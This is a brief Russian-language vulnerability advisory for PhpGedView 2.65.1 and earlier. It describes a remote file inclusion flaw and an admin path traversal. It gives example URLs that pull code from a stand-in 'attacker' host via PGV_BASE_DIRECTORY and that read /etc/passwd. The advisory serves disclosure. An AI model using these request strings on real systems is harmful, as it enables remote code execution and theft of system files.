Программа: PhpGedView 2.65.1 и более ранние версии
Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе.
Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример:
http://[target]/[phpGedView-directory ]/ index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=
http://attacker&THEME_DIR=/
Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе.
Пример:
http://[target]/[phpGedView-directory]/ editconfig_gedcom.php?gedcom_config
=../../../../../../etc/passwd